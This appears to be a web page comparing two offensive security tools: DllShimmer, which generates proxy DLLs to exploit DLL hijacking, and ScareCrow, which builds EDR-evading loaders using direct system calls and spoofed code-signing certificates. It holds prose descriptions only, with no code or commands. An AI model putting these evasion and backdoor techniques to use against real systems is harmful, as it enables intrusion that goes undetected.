DllShimmer vs ScareCrow
GitHub Stats
About DllShimmer
DllShimmer automates the exploitation of DLL hijacking vulnerabilities by generating proxy DLLs that perfectly mimic the export address table of the target DLL. When a vulnerable application loads the generated DLL, it transparently forwards all legitimate function calls to the original DLL while executing attacker-controlled code. The tool generates C++ boilerplate for the backdoor payload, handles export matching, and produces ready-to-compile Visual Studio projects. Significantly reduces the manual effort in weaponizing DLL hijack opportunities found during engagements.
About ScareCrow
ScareCrow is a payload creation framework designed to generate loaders that bypass Endpoint Detection and Response (EDR) products. It uses direct Windows system calls instead of standard WinAPI calls, avoiding the userland hooks that EDR products use for detection. ScareCrow supports multiple loader types (DLL sideloading, binary, JScript, HTA), code signing with spoofed certificates, and integration with shellcode generators like Donut. It represents the current state of the art in EDR evasion.
Platform Support
Tags
Shared
DllShimmer only
ScareCrow only